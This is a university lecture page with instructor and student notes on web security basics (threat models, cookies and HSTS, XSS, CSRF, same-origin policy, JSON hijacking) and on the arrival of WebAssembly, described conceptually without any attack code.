WebFund 2016W Lecture 22

Video

The video for the lecture given on March 31, 2016 is now available.

Notes

In Class

Lecture 22
------------
Web Security

Security in isolated systems
 - no networking

What is the threat model?

Threat model
 - what attacks are you trying to defend against
 - what attacks are you NOT trying to defend against

Computer in an isolated room
 - ignore physical attacks, e.g. sledgehammers

How to compromise this computer?
 - someone bad starts typing
 - someone inserts malicious media/device
   - parking lot flashdrive attack
     (solution: epoxy)
 - electromagnetic emissions
     (live in a faraday cage)

Computer on a network
 - all local attacks
 - attacker can send arbitrary network data to system
 - attacker can listen in on network traffic
 - attacker can change outgoing traffic

Basic defense: network crypto
 - encrypt to hide, sign data to protect integrity,
   verify authenticity

Who will access?
 - authenticated, authorized users
 - unauthorized individuals/systems
 - attackers (can be either of the above)

How can an attacker be "authorized"?
 - social engineering
   (can you please reset my password?)
 - brute force (try all the passwords)
 - technical compromise of credentials (keylogger)
 - authorized user turns/is malicious
   (insider attack)


And now the web

Who can access your application?
 - ANYBODY
 - for public web apps, ANYBODY is an authorized user


So just from this we can see that web security is going
to be hard.

The other half of the nightmare: the browser

Ideally, to secure systems you isolate components
  - build big walls

Your web browser has walls between pages...but there are
BIG HOLES (on purpose)

 - cookies, in particular, are shared
 - this is bad because the scope of cookies is
   determined by DNS (domain name system)

DNS has almost no security
 - there is DNSSEC but nobody uses it, yet at least

You can better protect cookies by using HSTS
 - force HTTPS everywhere on a page/domain
 - protects against mixes of http/https content and
   downgrade attacks

Why do we have cookies in the first place?
 - because HTTP was supposed to be stateless


Also...

Cross-site Scripting (XSS) attacks
 - not necessarily cross-site, not necesarily scripting
 - "web injection attacks"
 - see anywhere attacker can inject content into a page
   - (ads)
   - comments
   - social media
   - "user-generated content"
 - failure to sanitize untrusted input that is inserted
   into a web page
   (adding a comment to a page)
 - otherwise, you can insert arbitrary HTML, CSS,
   and JavaScript into the page

Cross-site request forgery
 - makes use of cookies automatically being sent
   to domain, no matter where the link came from
 - can stop using tokens in URLs, or checking
   Referer/Origin headers (and a few other ways)

Same-origin policy
 - data should only be loaded from the originating
   server
 - but, you can load almost anything else from
   anywhere
    - images
    - sound
    - javascript

So what about JSON?
 - when you load it with AJAX, you have same origin
   policy
 - but if you just treated it as a script...
 - and what if you were logged in
   - bank sending data as JSON

JSON files are valid JavaScript but they don't specify
the name to give to the data structure
 - so you can't access it, unless

To build an object, you have to call the object's
constructor
 - why not replace the constructor with our own method?
   e.g., override Array
 - this is solved in regular browsers for JSON by
   only using a clean JavaScript environment for
   JSON.parse()

This doesn't help you for code, but who cares about
code, right?
 - many websites dynamically generate JavaScript and put
   personal information into it

Solution?  Don't mix code and data!

WebAssembly
-----------

* Many, many people hate JavaScript
* Lots of code that isn't JavaScript
* But people want everything to run on the web
  in a browser


Past efforts at having alternative languages all
had a basic problem
 - they couldn't see the DOM
 - e.g., Java applets, Flash, Silverlight

And, what about all those other languages?
 - C, C++??!
 - how about games?

Unreal runs in a web page
 - there's WebGL which is pretty fast

So, why can't we compile code and have it run in the
browser?

Two old solutions:
 - NaCl (Google)
 - asm.js (Mozilla)
 
They joined up and are now making WebAssembly

This will be good for functionality and bad for
security.
 - security won't go well because code isn't
   designed for the web
 - but it will be cool to play games in a browser at
   full speed :-)

Student Notes

Administrative

There is a study session on April 11 morning.
Students can come to tutorial next week and consider it as extended office hours

Web Security

There are certain fundamental things of the web that make it very hard to secure
When considering security, we want to consider a threat model
- What attacks are you trying to defend against?
- What attacks are you NOT trying to defend against?

Computer in an isolated room

Ignore physical attacks, e.g. sledgehammers
If we talking about software level, how can the computer be compromised?
- Someone bad starts typing
- Someone inserts malicious media/device
- Parking lot flashdrive attack (a flashdrive is left in a parking lot for someone to pick up and plug in)
- (solution: epoxy, no one can plug anything in)
- Electromagnetic emissions
  - (solution: live in a Faraday cage, almost completely isolated from any EM transmission)

Computer on a network

Threats:
- All local attacks (all the physical attack will be there too)
- An attacker can send arbitrary network data to system
- An attacker can listen in on network traffic
- An attacker can change outgoing traffic
- (they can listen anything on the computer, can listen anything going out of the computer, can send arbitrary network data to the computer, can change data and leaving the computer going elsewhere)
How to protect against that?
Basic defense: network crypto
- Encrypt to hide, sign data to protect integrity, verify authenticity
We need to distinguish between who is trying to access the computer
Who will access?
- Authenticated/authorized users
- Unauthorized individuals/systems
- Attackers (can be either of the above)
How can an attacker be “authorized” ?
- Social engineering (can you please reset my password?)
- Brute force (try all the passwords)
- Technical compromise of credentials (keylogger)
- Authorized user turns/is malicious (insider attack)(most dangerous, because they are not only authorized, they also know the system)

And now the web

Why is the web so nasty?
Who can access your application?
- ANYBODY
- For most public web apps, ANYBODY is an authorized user
- There are different levels of insider attacks. Just because of you have account on gmail doesn’t mean you have access to the inside system. You don’t have full access, but you have some access, that is potentially dangerous.
So from this we can see that web security is going to be hard
The other half of the nightmare is the browser
Ideally, to secure systems you isolate components
- Build big walls
Your web browser has walls between pages... but there are BIG HOLES (on purpose)
The tabs in the browser are not so isolated (e.g Log in to an account on one tab then refresh another tab on the same page... it will be logged in as well). They are connected.
Cookies are being shared between the pages, it is a shared data source
This is bad because the scope of cookies is determined by DNS (Domain Name System)
DNS has almost no security
There is DNSSEC but nobody uses it, yet at least
- If you want to know more about this, you can find the article on usenix.org
You can better protect cookies by using HSTS
- This forces HTTPS everywhere on a page/domain
- Protects against mixes of HTTP/HTTPS communications and downgrade attacks
Why we do we have cookies in the first place?
- Because HTTP was supposed to be stateless
- The cookies are used instead to create a state between the client and server
If we could get past these problems, would we have proper security?
- Definitely not
There are other issues...

Cross-Site Scripting (XSS) Attacks

Not necessarily cross-site, and not necessarily scripting
More like “web injection attacks”
This can happen anywhere an attacker can inject content into a page
- Ads
- Comments
- Social media
- User-generated content
Problems can occur when there is a failure to sanitize untrusted input that is inserted into a web page
- This allows users to insert arbitrary HTML, CSS, and JavaScript into the page

Cross-Site Request Forgery

Cross-site scripting is more straight-forward, cross-site request forgery is a little bit weird
This involves having a link from a page sent by one server cause a request to be sent off to another server
If you are logged in at the other server, this can cause things to happen which you didn't expect or want to happen
- For example, while logged in to the course wiki, a link from a page on a different website may cause a page to be deleted from the wiki by sending an appropriate request
This makes use of cookies automatically being sent to a server, no matter where the link came from
How can we stop this?
- One way is to try to verify where the link came from
- In the browser tools, go to the network tab and check the referer header
  - This header indicates where the request came from
- So in principle, to stop a cross-site request forgery, we can check this header in the requests received on the server
  - If it came from one of our pages, then we can trust the request
  - Otherwise we don’t
- That does not actually work. It kind of works, but not always
- Why? Because the Referer header can often be scrapped by a proxy
- An alternative solution is to randomize your links
- Instead of using a predictable url, stick a random string in the middle of it
  - The string is connected to the client's cookie so that the attacker can’t guess it

Same-Origin Policy

Data should only loaded from the originating server but, you can load almost anything else from anywhere
- Images
- Sound
- JavaScript
So what about JSON?
- when you load it with AJAX, you have the same-origin policy
- But what if you just treated it as a script? (why not just load it in the page?)
- And what if you were logged in?
  - Consider a bank sending data as JSON (Could I from another tab just grab your bank account data as a JSON data in the background and see what exactly what you have? It doesn’t work.)
JSON files are valid JavaScript structure (JSON is a subset of JavaScript)
JSON files do not specify a name to give to the data structure so you can’t access it by name
However, to build the object in the first place, its constructor must be called
- Why not replace the constructor with our own method?
  - e.g., override Array
- This is solved in regular browsers for JSON by only using a clean JavaScript environment for JSON.parse()
- But what about code?
  - This doesn’t help you for code, but who cares about code, right?
- Turns out many websites dynamically generate JavaScript and put personal information into it (different people have different scripts)
  - Solution? Don’t mix code and data! (treat the JSON separately, let the code just be loaded on the system, don’t mix it with anything else)

Web Assembly

Many, many people hate JavaScript
- There is a lot of code that isn’t JavaScript but people want everything to run on the web in a browser (JavaScript is the language of the web)
Past efforts at having alternative languages all had a basic problem
- They couldn’t see the DOM
  - e.g., Java applets, Flash, Silverlight
And, what about all those other languages?
- C, C++?
- How about games?
  - Unreal Engine runs in a web page because there’s WebGL which is pretty fast (WebGL is a subset of OpenGL)
So why can’t we compile code and have it run in the browser?
Two old solutions:
- PNaCl/NaCl (Google)
  - Portable Native Client (PNaCl) is a sandbox for running compiled C and C++ code in the browser efficiently and securely, independent of the user’s operating system or architecture (e.g. x86 or ARM). (NaCl is more or less the same except it only can be used by extensions/plugins and depends on the user's CPU architecture; you can only use an x86 NaCl app on x86.)
- asm.js (Mozilla)
  - This uses a compiler that takes arbitrary programs and compiles them to JavaScript
  - asm.js is perfectly legal JavaScript, it is tightly restricted JavaScript
  - You cannot read asm.js code, it looks like binary
Google and Mozilla joined up and are now making WebAssembly
- You can compile arbitrary code to run inside of the browser with WebAssembly
- This will be good for functionality and bad for security
  - Security won’t go well because the code isn’t designed for the web
  - But it will be cool to play games in a browser at full speed